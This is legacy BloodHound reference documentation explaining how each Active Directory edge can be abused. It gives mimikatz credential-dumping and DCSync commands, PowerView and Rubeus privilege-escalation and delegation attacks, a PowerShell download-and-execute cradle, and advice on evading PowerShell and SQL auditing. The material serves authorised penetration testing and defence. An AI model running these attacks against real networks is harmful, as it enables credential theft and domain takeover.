
This documentation applies to Legacy BloodHound and is no longer maintained.

See up-to-date documentation for BloodHound CE here: About BloodHound Edges


Edges are part of the graph construct, and are represented as links that connect one node to another. For example, this shows the user node for David McGuire connected to two groups, “Domain Admins” and “Domain Users”, via the “MemberOf” edge, indicating this user belongs to both of those groups:

David McGuire is a member of two groups

The direction of the edge always indicates the direct of attack, or the direction of escalating privileges. For example, because the David McGuire user belongs to the Domain Users and Domain Admins group, his user has the same privileges both of those groups have.


This edge indicates that principal is a local administrator on the target computer. By default, administrators have several ways to perform remote code execution on Windows systems, including via RDP, WMI, WinRM, the Service Control Manager, and remote DCOM execution.

Further, administrators have several options for impersonating other users logged onto the system, including plaintext password extraction, token impersonation, and injecting into processes running as another user.

Finally, administrators can often disable host-based security controls that would otherwise prevent the aforementioned techniques.

Abuse Info

There are several ways to pivot to a Windows system. If using Cobalt Strike’s beacon, check the help info for the commands “psexec”, “psexec_psh”, “wmi”, and “winrm”. With Empire, consider the modules for Invoke-PsExec, Invoke-DCOM, and Invoke-SMBExec.

With Metasploit, consider the modules “exploit/windows/smb/psexec”, “exploit/windows/winrm/winrm_script_exec”, and “exploit/windows/local/ps_wmi_exec”.

Additionally, there are several manual methods for remotely executing code on the machine, including via RDP, with the service control binary and interaction with the remote machine’s service control manager, and remotely instantiating DCOM objects. For more information about these lateral movement techniques, see the References section below.

Gathering credentials

The most well-known tool for gathering credentials from a Windows system is mimikatz. mimikatz is built into several agents and toolsets, including Cobalt Strike’s beacon, Empire, and Meterpreter. While running in a high integrity process with SeDebugPrivilege, execute one or more of mimikatz’s credential gathering techniques (e.g.: sekurlsa::wdigest, sekurlsa::logonpasswords, etc.), then parse or investigate the output to find clear-text credentials for other users logged onto the system.

You may also gather credentials when a user types them or copies them to their clipboard! Several keylogging capabilities exist, several agents and toolsets have them built-in. For instance, you may use meterpreter’s “keyscan_start” command to start keylogging a user, then “keyscan_dump” to return the captured keystrokes. Or, you may use PowerSploit’s Invoke-ClipboardMonitor to periodically gather the contents of the user’s clipboard.

Token Impersonation

You may run into a situation where a user is logged onto the system, but you can’t gather that user’s credential. This may be caused by a host-based security product, lsass protection, etc. In those circumstances, you may abuse Windows’ token model in several ways. First, you may inject your agent into that user’s process, which will give you a process token as that user, which you can then use to authenticate to other systems on the network. Or, you may steal a process token from a remote process and start a thread in your agent’s process with that user’s token. For more information about token abuses, see the References tab.

Disabling host-based security controls

Several host-based controls may affect your ability to execute certain techniques, such as credential theft, process injection, command line execution, and writing files to disk. Administrators can often disable these host-based controls in various ways, such as stopping or otherwise disabling a service, unloading a driver, or making registry key changes. For more information, see the References section below.

Opsec Considerations

There are several forensic artifacts generated by the techniques described above. For instance, lateral movement via PsExec will generate 4697 events on the target system. If the target organization is collecting and analyzing those events, they may very easily detect lateral movement via PsExec.

Additionally, an EDR product may detect your attempt to inject into lsass and alert a SOC analyst. There are many more opsec considerations to keep in mind when abusing administrator privileges. For more information, see the References section below.


Groups in active directory grant their members any privileges the group itself has. If a group has rights to another principal, users/computers in the group, as well as other groups inside the group inherit those permissions.

Abuse Info

No abuse is necessary. This edge simply indicates that a principal belongs to a security group.

Opsec Considerations

No opsec considerations apply to this edge.


When a user authenticates to a computer, they often leave credentials exposed on the system, which can be retrieved through LSASS injection, token manipulation or theft, or injecting into a user’s process.

Any user that is an administrator to the system has the capability to retrieve the credential material from memory if it still exists.


A session does not guarantee credential material is present, only possible.

This video explains exactly how BloodHound’s session data collection method works:

Abuse Info

When a user has a session on the computer, you may be able to obtain credentials for the user via credential dumping or token impersonation. You must be able to move laterally to the computer, have administrative access on the computer, and the user must have a non-network logon session on the computer.

Once you have established a Cobalt Strike Beacon, Empire agent, or other implant on the target, you can use mimikatz to dump credentials of the user that has a session on the computer. While running in a high integrity process with SeDebugPrivilege, execute one or more of mimikatz’s credential gathering techniques (e.g.: sekurlsa::wdigest, sekurlsa::logonpasswords, etc.), then parse or investigate the output to find clear-text credentials for other users logged onto the system.

You may also gather credentials when a user types them or copies them to their clipboard! Several keylogging capabilities exist, several agents and toolsets have them built-in. For instance, you may use meterpreter’s “keyscan_start” command to start keylogging a user, then “keyscan_dump” to return the captured keystrokes. Or, you may use PowerSploit’s Invoke-ClipboardMonitor to periodically gather the contents of the user’s clipboard.

Token Impersonation

You may run into a situation where a user is logged onto the system, but you can’t gather that user’s credential. This may be caused by a host-based security product, lsass protection, etc. In those circumstances, you may abuse Windows’ token model in several ways. First, you may inject your agent into that user’s process, which will give you a process token as that user, which you can then use to authenticate to other systems on the network. Or, you may steal a process token from a remote process and start a thread in your agent’s process with that user’s token. For more information about token abuses, see the References section below.

User sessions can be short lived and only represent the sessions that were present at the time of collection. A user may have ended their session by the time you move to the computer to target them. However, users tend to use the same machines, such as the workstations or servers they are assigned to use for their job duties, so it can be valuable to check multiple times if a user session has started.

Opsec Considerations

An EDR product may detect your attempt to inject into lsass and alert a SOC analyst. There are many more opsec considerations to keep in mind when stealing credentials or tokens. For more information, see the References section.


The given source principal has, in its SIDHistory attribute, the SID for the target principal.

When a kerberos ticket is created for source principal, it will include the SID for the target principal, and therefore grant the source principal the same privileges and permissions as the target principal.

Abuse Info

No special actions are needed to abuse this, as the kerberos tickets created will have all SIDs in the object’s SID history attribute added to them; however, if traversing a domain trust boundary, ensure that SID filtering is not enforced, as SID filtering will ignore any SIDs in the SID history portion of a kerberos ticket.

By default, SID filtering is not enabled for all domain trust types.

Opsec Considerations

No opsec considerations apply to this edge.


This edge indicates that the principal can reset the password of the target user without knowing the current password of that user.

To see an example of this edge being abused, see this clip from Derbycon 2017:

Abuse Info

There are at least two ways to execute this attack. The first and most obvious is by using the built-in net.exe binary in Windows (e.g.: net user dfm.a Password123! /domain). See the opsec considerations section for why this may be a bad idea. The second, and highly recommended method, is by using the Set-DomainUserPassword function in PowerView. This function is superior to using the net.exe binary in several ways. For instance, you can supply alternate credentials, instead of needing to run a process as or logon as the user with the ForceChangePassword privilege. Additionally, you have much safer execution options than you do with spawning net.exe (see the opsec info below).

To abuse this privilege with PowerView’s Set-DomainUserPassword, first import PowerView into your agent session or into a PowerShell instance at the console. You may need to authenticate to the Domain Controller as the user with the password reset privilege if you are not running a process as that user.

To do this in conjunction with Set-DomainUserPassword, first create a PSCredential object (these examples comes from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('CONTOSO\\dfm.a', $SecPassword)

Then create a secure string object for the password you want to set on the target user:

$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

Finally, use Set-DomainUserPassword, optionally specifying $Cred if you are not already running within a process as the user with the password reset privilege

Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred

Now that you know the target user’s plain text password, you can either start a new agent as that user, or use that user’s credentials in conjunction with PowerView’s ACL abuse functions, or perhaps even RDP to a system the target user has access to. For more ideas and information, see the references section below.

Opsec Considerations

Executing this abuse with the net binary will necessarily require command line execution. If your target organization has command line logging enabled, this is a detection opportunity for their analysts.

Regardless of what execution procedure you use, this action will generate a 4724 event on the domain controller that handled the request. This event may be centrally collected and analyzed by security analysts, especially for users that are obviously very high privilege groups (i.e.: Domain Admin users). Also be mindful that PowerShell v5 introduced several key security features such as script block logging and AMSI that provide security analysts another detection opportunity. You may be able to completely evade those features by downgrading to PowerShell v2.

Finally, by changing a service account password, you may cause that service to stop functioning properly. This can be bad not only from an opsec perspective, but also a client management perspective. Be careful!


This edge indicates the principal has the ability to add arbitrary principlas to the target security group. Because of security group delegation, the members of a security group have the same privileges as that group.

By adding yourself to a group and refreshing your token, you gain all the same privileges that group has.

See this clip for an example of this edge being abused:

Abuse Info

There are at least two ways to execute this attack. The first and most obvious is by using the built-in net.exe binary in Windows (e.g.: net group “Domain Admins” dfm.a /add /domain). See the opsec considerations tab for why this may be a bad idea. The second, and highly recommended method, is by using the Add-DomainGroupMember function in PowerView. This function is superior to using the net.exe binary in several ways. For instance, you can supply alternate credentials, instead of needing to run a process as or logon as the user with the AddMember privilege. Additionally, you have much safer execution options than you do with spawning net.exe (see the opsec tab).

To abuse this privilege with PowerView’s Add-DomainGroupMember, first import PowerView into your agent session or into a PowerShell instance at the console.

You may need to authenticate to the Domain Controller as the user with the AddMembers right if you are not running a process as that user. To do this in conjunction with Add-DomainGroupMember, first create a PSCredential object (these examples comes from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)

Then, use Add-DomainGroupMember, optionally specifying $Cred if you are not already running within a process owned by the user with the AddMembers privilege

Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred

Finally, verify that the user was successfully added to the group with PowerView’s Get-DomainGroupMember:

Get-DomainGroupMember -Identity 'Domain Admins'

Opsec Considerations

Executing this abuse with the net binary will require command line execution. If your target organization has command line logging enabled, this is a detection opportunity for their analysts.

Regardless of what execution procedure you use, this action will generate a 4728 event on the domain controller that handled the request. This event may be centrally collected and analyzed by security analysts, especially for groups that are obviously very high privilege groups (i.e.: Domain Admins). Also be mindful that Powershell 5 introduced several key security features such as script block logging and AMSI that provide security analysts another detection opportunity.

You may be able to completely evade those features by downgrading to PowerShell v2.


This edge indicates the principal has the ability to add itself to the target security group. Because of security group delegation, the members of a security group have the same privileges as that group.

By adding yourself to a group and refreshing your token, you gain all the same privileges that group has.

See this clip for an example of this edge being abused:

Abuse Info

There are at least two ways to execute this attack. The first and most obvious is by using the built-in net.exe binary in Windows (e.g.: net group “Domain Admins” dfm.a /add /domain). See the opsec considerations tab for why this may be a bad idea. The second, and highly recommended method, is by using the Add-DomainGroupMember function in PowerView. This function is superior to using the net.exe binary in several ways. For instance, you can supply alternate credentials, instead of needing to run a process as or logon as the user with the AddSelf privilege. Additionally, you have much safer execution options than you do with spawning net.exe (see the opsec tab).

To abuse this privilege with PowerView’s Add-DomainGroupMember, first import PowerView into your agent session or into a PowerShell instance at the console.

You may need to authenticate to the Domain Controller as the user with the AddSelf right if you are not running a process as that user. To do this in conjunction with Add-DomainGroupMember, first create a PSCredential object (these examples comes from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)

Then, use Add-DomainGroupMember, optionally specifying $Cred if you are not already running within a process owned by the user with the AddSelf privilege

Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred

Finally, verify that the user was successfully added to the group with PowerView’s Get-DomainGroupMember:

Get-DomainGroupMember -Identity 'Domain Admins'

Opsec Considerations

Executing this abuse with the net binary will require command line execution. If your target organization has command line logging enabled, this is a detection opportunity for their analysts.

Regardless of what execution procedure you use, this action will generate a 4728 event on the domain controller that handled the request. This event may be centrally collected and analyzed by security analysts, especially for groups that are obviously very high privilege groups (i.e.: Domain Admins). Also be mindful that Powershell 5 introduced several key security features such as script block logging and AMSI that provide security analysts another detection opportunity.

You may be able to completely evade those features by downgrading to PowerShell v2.


Remote Desktop access allows you to enter an interactive session with the target computer. If authenticating as a low privilege user, a privilege escalation may allow you to gain high privileges on the system.


This edge does not guarantee privileged execution.

Abuse Info

Abuse of this privilege will depend heavily on the type of access you have.

PlainText Credentials with Interactive Access

With plaintext credentials, the easiest way to exploit this privilege is using the built-in Windows Remote Desktop Client (mstsc.exe). Open mstsc.exe and input the target computer name. When prompted for credentials, input the credentials for the user with RDP rights to initiate the remote desktop connection.

Password Hash with Interactive Access

With a password hash, exploitation of this privilege will require local administrator privileges on a system, and the remote server must allow Restricted Admin Mode.

First, inject the NTLM credential for the user you’re abusing into memory using mimikatz:

lsadump::pth /user:dfm /domain:testlab.local /ntlm:<ntlm hash> /run:"mstsc.exe /restrictedadmin"

This will open a new RDP window. Input the target computer name to initiate the remote desktop connection. If the target server does not support Restricted Admin Mode, the session will fail.

Plaintext Credentials without Interactive Access

This method will require some method of proxying traffic into the network, such as the socks command in Cobalt Strike, or direct internet connection to the target network, as well as the xfreerdp (suggested because of support of Network Level Authentication (NLA)) tool, which can be installed from the freerdp-x11 package. If using socks, ensure that proxychains is configured properly. Initiate the remote desktop connection with the following command:

proxychains xfreerdp /u:dfm /d:testlab.local /v:<computer ip>

xfreerdp will prompt you for a password, and then initiate the remote desktop connection.

Password Hash without Interactive Access

This method will require some method of proxying traffic into the network, such as the socks command in cobaltstrike, or direct internet connection to the target network, as well as the xfreerdp (suggested because of support of Network Level Authentication (NLA)) tool, which can be installed from the freerdp-x11 package. Additionally, the target computer must allow Restricted Admin Mode. If using socks, ensure that proxychains is configured properly. Initiate the remote desktop connection with the following command:

proxychains xfreerdp /pth:<ntlm hash> /u:dfm /d:testlab.local /v:<computer ip>

This will initiate the remote desktop connection, and will fail if Restricted Admin Mode is not enabled.

Opsec Considerations

If the target computer is a workstation and a user is currently logged on, one of two things will happen. If the user you are abusing is the same user as the one logged on, you will effectively take over their session and kick the logged on user off, resulting in a message to the user. If the users are different, you will be prompted to kick the currently logged on user off the system and log on. If the target computer is a server, you will be able to initiate the connection without issue provided the user you are abusing is not currently logged in.

Remote desktop will create Logon and Logoff events with the access type RemoteInteractive.


PS Session access allows you to enter an interactive session with the target computer. If authenticating as a low privilege user, a privilege escalation may allow you to gain high privileges on the system.


This edge does not guarantee privileged execution.

Abuse Info

Abuse of this privilege will require you to have interactive access with a system on the network.

A remote session can be opened using the New-PSSession powershell command.

You may need to authenticate to the Domain Controller as the user with the PSRemote rights on the target computer if you are not running as that user. To do this in conjunction with New-PSSession, first create a PSCredential object (these examples comes from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)

Then use the New-PSSession command with the credential we just created:

$session = New-PSSession -ComputerName <target computer name> -Credential $Cred

This will open a PowerShell session on the target computer

You can then run a command on the system using the Invoke-Command cmdlet and the session you just created

Invoke-Command -Session $session -ScriptBlock {Start-Process cmd}

Cleanup of the session is done with the Disconnect-PSSession and Remove-PSSession commands.

Disconnect-PSSession -Session $session
Remove-PSSession -Session $session

An example of running through this Cobalt Strike for lateral movement is as follows:

powershell $session =  New-PSSession -ComputerName win-2016-001; Invoke-Command -Session $session
-ScriptBlock {IEX ((new-object net.webclient).downloadstring(''))};
Disconnect-PSSession -Session $session; Remove-PSSession -Session $session

Opsec Considerations

When using the PowerShell functions, keep in mind that PowerShell v5 introduced several security mechanisms that make it much easier for defenders to see what’s going on with PowerShell in their network, such as script block logging and AMSI.

Entering a PSSession will generate a logon event on the target computer.


This can allow code execution under certain conditions by instantiating a COM object on a remote machine and invoking its methods.

Abuse Info

The PowerShell script Invoke-DCOM implements lateral movement using a variety of different COM objects (ProgIds: MMC20.Application, ShellWindows, ShellBrowserWindow, ShellBrowserWindow, and ExcelDDE). LethalHTA implements lateral movement using the HTA COM object (ProgId: htafile).

One can manually instantiate and manipulate COM objects on a remote machine using the following PowerShell code. If specifying a COM object by its CLSID:

$ComputerName = <target computer name>              # Remote computer
$clsid = "{fbae34e8-bf95-4da8-bf98-6c6e580aa348}"   # GUID of the COM object
$Type = [Type]::GetTypeFromCLSID($clsid, $ComputerName)
$ComObject = [Activator]::CreateInstance($Type)

If specifying a COM object by its ProgID:

$ComputerName = <target computer name>              # Remote computer
$ProgId = "<NAME>"                                  # GUID of the COM object
$Type = [Type]::GetTypeFromProgID($ProgId, $ComputerName)
$ComObject = [Activator]::CreateInstance($Type)

Opsec Considerations

The artifacts generated when using DCOM vary depending on the specific COM object used.

DCOM is built on top of the TCP/IP RPC protocol (TCP ports 135 + high ephemeral ports) and may leverage several different RPC interface UUIDs(outlined here). In order to use DCOM, one must be authenticated. Consequently, logon events and authentication-specific logs(Kerberos, NTLM, etc.) will be generated when using DCOM.

Processes may be spawned as the user authenticating to the remote system, as a user already logged into the system, or may take advantage of an already spawned process.

Many DCOM servers spawn under the process “svchost.exe -k DcomLaunch” and typically have a command line containing the string ” -Embedding” or are executing inside of the DLL hosting process “DllHost.exe /Processid:{<AppId>}” (where AppId is the AppId the COM object is registered to use). Certain COM services are implemented as service executables; consequently, service-related event logs may be generated.


The user is a SQL admin on the target computer

There is at least one MSSQL instance running on the computer where the user with the inbound SQLAdmin edge is the account configured to run the SQL Server instance. The typical configuration for MSSQL is to have the local Windows account or Active Directory domain account that is configured to run the SQL Server service (the primary database engine for SQL Server) have sysadmin privileges in the SQL Server application. As a result, the SQL Server service account can be used to log into the SQL Server instance remotely, read all of the databases (including those protected with transparent encryption), and run operating systems command through SQL Server (as the service account) using a variety of techniques.

For Windows systems that have been joined to an Active Directory domain, the SQL Server instances and the associated service account can be identified by executing a LDAP query for a list of “MSSQLSvc” Service Principal Names (SPN) as a domain user. In short, when the Database Engine service starts, it attempts to register the SPN, and the SPN is then used to help facilitate Kerberos authentication.

Author: Scott Sutherland

This clip demonstrates how to abuse this edge:

Abuse Info

Scott Sutherland from NetSPI has authored PowerUpSQL, a PowerShell Toolkit for Attacking SQL Server. Major contributors include Antti Rantasaari, Eric Gruber, and Thomas Elling. Before executing any of the below commands, download PowerUpSQL and load it into your PowerShell instance. Get PowerUpSQL here:

Finding Data

Get a list of databases, sizes, and encryption status:

Get-SQLDatabaseThreaded –Verbose -Instance sqlserver\instance –Threads 10 -NoDefaults

Search columns and data for keywords:

Get-SQLColumnSampleDataThreaded –Verbose -Instance sqlserver\instance –Threads 10 –Keyword "card, password" –SampleSize 2 –ValidateCC -NoDefaults | ft -AutoSize

Executing Commands

Below are examples of PowerUpSQL functions that can be used to execute operating system commands on remote systems through SQL Server using different techniques. The level of access on the operating system will depend largely what privileges are provided to the service account. However, when domain accounts are configured to run SQL Server services, it is very common to see them configured with local administrator privileges.

xp_cmdshell Execute Example:

Invoke-SQLOSCmd -Verbose -Command "Whoami" -Threads 10 -Instance sqlserver\instance

Agent Job Execution Examples:

Invoke-SQLOSCmdAgentJob -Verbose -SubSystem CmdExec -Command "echo hello > c:\windows\temp\test1.txt" -Instance sqlserver\instance -username myuser -password mypassword
Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" | out-file c:\windows\temp\test2.txt' -Sleep 20 -Instance sqlserver\instance -username myuser -password mypassword
Invoke-SQLOSCmdAgentJob -Verbose -SubSystem VBScript -Command 'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test3.txt' -Instance sqlserver\instance -username myuser -password mypassword
Invoke-SQLOSCmdAgentJob -Verbose -SubSystem JScript -Command 'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test3.txt' -Instance sqlserver\instance -username myuser -password mypassword

Python Subsystem Execution:

Invoke-SQLOSPython -Verbose -Command "Whoami" -Instance sqlserver\instance

R subsystem Execution Example:

Invoke-SQLOSR -Verbose -Command "Whoami" -Instance sqlserver\instance

OLE Execution Example:

Invoke-SQLOSOle -Verbose -Command "Whoami" -Instance sqlserver\instance

CLR Execution Example:

Invoke-SQLOSCLR -Verbose -Command "Whoami" -Instance sqlserver\instance

Custom Extended Procedure Execution Example:

  1. Create a custom extended stored procedure:
Create-SQLFileXpDll -Verbose -OutFile c:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test
  1. Host the test.dll on a share readable by the SQL Server service account:
Get-SQLQuery -Verbose -Query "sp_addextendedproc 'xp_test', '\\yourserver\yourshare\myxp.dll'" -Instance sqlserver\instance
  1. Run extended stored procedure:
Get-SQLQuery -Verbose -Query "xp_test" -Instance sqlserver\instance
  1. Remove extended stored procedure:
Get-SQLQuery -Verbose -Query "sp_dropextendedproc 'xp_test'" -Instance sqlserver\instance

Author: Scott Sutherland

Opsec Considerations

Prior to executing operating system commands through SQL Server, review the audit configuration and choose a command execution method that is not being monitored.

View audits:

SELECT * FROM sys.dm_server_audit_status

View server specifications:

SELECT audit_id, as audit_name, as server_specification_name,
FROM sys.server_audits AS a
JOIN sys.server_audit_specifications AS s
ON a.audit_guid = s.audit_guid
JOIN sys.server_audit_specification_details AS d
ON s.server_specification_id = d.server_specification_id

View database specifications:

SELECT a.audit_id, as audit_name, as database_specification_name,
OBJECT_NAME(d.major_id) as object,
d.is_group, s.create_date,
FROM sys.server_audits AS a
JOIN sys.database_audit_specifications AS s
ON a.audit_guid = s.audit_guid
JOIN sys.database_audit_specification_details AS d
ON s.database_specification_id = d.database_specification_id

If server audit specifications are configured on the SQL Server, event ID 15457 logs may be created in the Windows Application log when SQL Server level configurations are changed to facilitate OS command execution.

If database audit specifications are configured on the SQL Server, event ID 33205 logs may be created in the Windows Application log when Agent and database level configuration changes are made.

A summary of the what will show up in the logs, along with the TSQL queries for viewing and configuring audit configurations can be found at

Author: Scott Sutherland


The constrained delegation primitive allows a principal to authenticate as any user to specific services (found in the msds-AllowedToDelegateTo LDAP property in the source node tab) on the target computer. That is, a node with this privilege can impersonate any domain principal (including Domain Admins) to the specific service on the target host. One caveat- impersonated users can not be in the “Protected Users” security group or otherwise have delegation privileges revoked.

An issue exists in the constrained delegation where the service name (sname) of the resulting ticket is not a part of the protected ticket information, meaning that an attacker can modify the target service name to any service of their choice. For example, if msds-AllowedToDelegateTo is “HTTP/”, tickets can be modified for LDAP/HOST/etc. service names, resulting in complete server compromise, regardless of the specific service listed.

Abuse Info

Abusing this privilege can utilize Benjamin Delpy’s Kekeo project, proxying in traffic generated from the Impacket library, or using the Rubeus project’s s4u abuse.

In the following example, victim is the attacker-controlled account (i.e. the hash is known) that is configured for constrained delegation. That is, victim has the “HTTP/PRIMARY.testlab.local” service principal name (SPN) set in its msds-AllowedToDelegateTo property. The command first requests a TGT for the victim user and executes the S4U2self/S4U2proxy process to impersonate the “admin” user to the “HTTP/PRIMARY.testlab.local” SPN. The alternative sname “cifs” is substituted in to the final service ticket and the ticket is submitted to the current logon session. This grants the attacker the ability to access the file system of PRIMARY.testlab.local as the “admin” user.

Rubeus.exe s4u /user:victim /rc4:2b576acbe6bcfda7294d6bd18041b8fe /impersonateuser:admin /msdsspn:"HTTP/PRIMARY.testlab.local" /altservice:cifs /ptt

Opsec Considerations

As mentioned in the abuse info, in order to currently abuse this primitive the Rubeus C# assembly needs to be executed on some system with the ability to send/receive traffic in the domain. See the References for more information.


This edge represents the combination of GetChanges and GetChangesAll. The combination of both these privileges grants a principal the ability to perform the DCSync attack.

Abuse Info

With both GetChanges and GetChangesAll privileges in BloodHound, you may perform a dcsync attack to get the password hash of an arbitrary principal using mimikatz:

lsadump::dcsync /domain:testlab.local /user:Administrator

You can also perform the more complicated ExtraSids attack to hop domain trusts. For information on this see the blog post by harmj0y in the references tab.

Opsec Considerations

For detailed information on detection of DCSync as well as opsec considerations, see the ADSecurity post in the references section below.


The combination of both these privileges grants a principal the ability to perform the DCSync attack.

Abuse Info

With both GetChanges and GetChangesAll privileges in BloodHound, you may perform a dcsync attack to get the password hash of an arbitrary principal using mimikatz:

lsadump::dcsync /domain:testlab.local /user:Administrator

You can also perform the more complicated ExtraSids attack to hop domain trusts. For information on this see the blog post by harmj0y in the references tab.

Opsec Considerations

For detailed information on detection of DCSync as well as opsec considerations, see the ADSecurity post in the references section below.


This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.

Abuse Info

With GenericAll Over a Group:

Full control of a group allows you to directly modify group membership of the group. For full abuse info in that scenario, see the Abuse Info section under the AddMembers edge

With GenericAll Over a User:

Targeted Kerberoast A targeted kerberoast attack can be performed using PowerView’s Set-DomainObject along with Get-DomainSPNTicket.

You may need to authenticate to the Domain Controller as the user with full control over the target user if you are not running a process as that user. To do this in conjunction with Set-DomainObject, first create a PSCredential object (these examples comes from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)

Then, use Set-DomainObject, optionally specifying $Cred if you are not already running a process as the user with full control over the target user.

Set-DomainObject -Credential $Cred -Identity harmj0y -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}

After running this, you can use Get-DomainSPNTicket as follows:

Get-DomainSPNTicket -Credential $Cred harmj0y | fl

The recovered hash can be cracked offline using the tool of your choice. Cleanup of the ServicePrincipalName can be done with the Set-DomainObject command:

Set-DomainObject -Credential $Cred -Identity harmj0y -Clear serviceprincipalname

Force Change Password

You can also reset user passwords with full control over user objects. For full abuse info about this attack, see the information under the ForceChangePassword edge

With GenericAll Over a Computer

Full control of a computer object is abusable when the computer’s local admin account credential is controlled with LAPS. The clear-text password for the local administrator account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. With full control of the computer object, you may have the ability to read this attribute, or grant yourself the ability to read the attribute by modifying the computer object’s security descriptor.

Alternatively, Full control of a computer object can be used to perform a resource based constrained delegation attack.

Abusing this primitive is currently only possible through the Rubeus project.

First, if an attacker does not control an account with an SPN set, Kevin Robertson’s Powermad project can be used to add a new attacker-controlled computer account:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account:

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we’re taking over, again using PowerView in this case:

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:

Rubeus.exe hash /password:Summer2018!

And finally we can use Rubeus’ s4u module to get a service ticket for the service name (sname) we want to “pretend” to be “admin” for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER:

Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt

With GenericAll Over a Domain Object

Full control of a domain object grants you both DS-Replication-Get-Changes as well as DS-Replication-Get-Changes-All rights. The combination of these rights allows you to perform the dcsync attack using mimikatz. To grab the credential of the user harmj0y using these rights:

lsadump::dcsync /domain:testlab.local /user:harmj0y

See a video walk through of how to execute this attack here:

With GenericAll Over a GPO

With full control of a GPO, you may make modifications to that GPO which will then apply to the users and computers affected by the GPO. Select the target object you wish to push an evil policy down to, then use the gpedit GUI to modify the GPO, using an evil policy that allows item-level targeting, such as a new immediate scheduled task. Then wait at least 2 hours for the group policy client to pick up and execute the new evil policy. See the references tab for a more detailed write up on this abuse

With GenericAll Over an OU

With full control of an OU, you may add a new ACE on the OU that will inherit down to the objects under that OU. Below are two options depending on how targeted you choose to be in this step:

Generic Descendent Object Takeover:

The simplest and most straight forward way to abuse control of the OU is to apply a GenericAll ACE on the OU that will inherit down to all object types. Again, this can be done using PowerView. This time we will use the New-ADObjectAccessControlEntry, which gives us more control over the ACE we add to the OU.

First, we need to reference the OU by its ObjectGUID, not its name. You can find the ObjectGUID for the OU in the BloodHound GUI by clicking the OU, then inspecting the objectid value

Next, we will fetch the GUID for all objects. This should be ‘00000000-0000-0000-0000-000000000000’:

$Guids = Get-DomainGUIDMap
$AllObjectsPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'All'} | select -ExpandProperty name

Then we will construct our ACE. This command will create an ACE granting the “JKHOLER” user full control of all descendant objects:

ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity 'JKOHLER' -Right GenericAll -AccessControlType Allow -InheritanceType All -InheritedObjectType $AllObjectsPropertyGuid

Finally, we will apply this ACE to our target OU:

$OU = Get-DomainOU -Raw (OU GUID)
$DsEntry = $OU.GetDirectoryEntry()
$dsEntry.PsBase.Options.SecurityMasks = 'Dacl'

Now, the “JKOHLER” user will have full control of all descendent objects of each type.

Targeted Descendent Object Takeoever:

If you want to be more targeted with your approach, it is possible to specify precisely what right you want to apply to precisely which kinds of descendent objects. You could, for example, grant a user “ForceChangePassword” privilege against all user objects, or grant a security group the ability to read every GMSA password under a certain OU. Below is an example taken from PowerView’s help text on how to grant the “ITADMIN” user the ability to read the LAPS password from all computer objects in the “Workstations” OU:

$Guids = Get-DomainGUIDMap
$AdmPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'ms-Mcs-AdmPwd'} | select -ExpandProperty name
$CompPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'Computer'} | select -ExpandProperty name
$ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity itadmin -Right ExtendedRight,ReadProperty -AccessControlType Allow -ObjectType $AdmPropertyGuid -InheritanceType All -InheritedObjectType $CompPropertyGuid
$OU = Get-DomainOU -Raw Workstations
$DsEntry = $OU.GetDirectoryEntry()
$dsEntry.PsBase.Options.SecurityMasks = 'Dacl'

Opsec Considerations


With write access to the target object’s DACL, you can grant yourself any privilege you want on the object.

Abuse Info

With the ability to modify the DACL on the target object, you can grant yourself almost any privilege against the object you wish.


With WriteDACL over a group, grant yourself the right to add members to the group:

Add-DomainObjectAcl -TargetIdentity "Domain Admins" -Rights WriteMembers

See the abuse info for AddMembers edge for more information about execution the attack from there.


With WriteDACL over a user, grant yourself full control of the user object:

Add-DomainObjectAcl -TargetIdentity harmj0y -Rights All

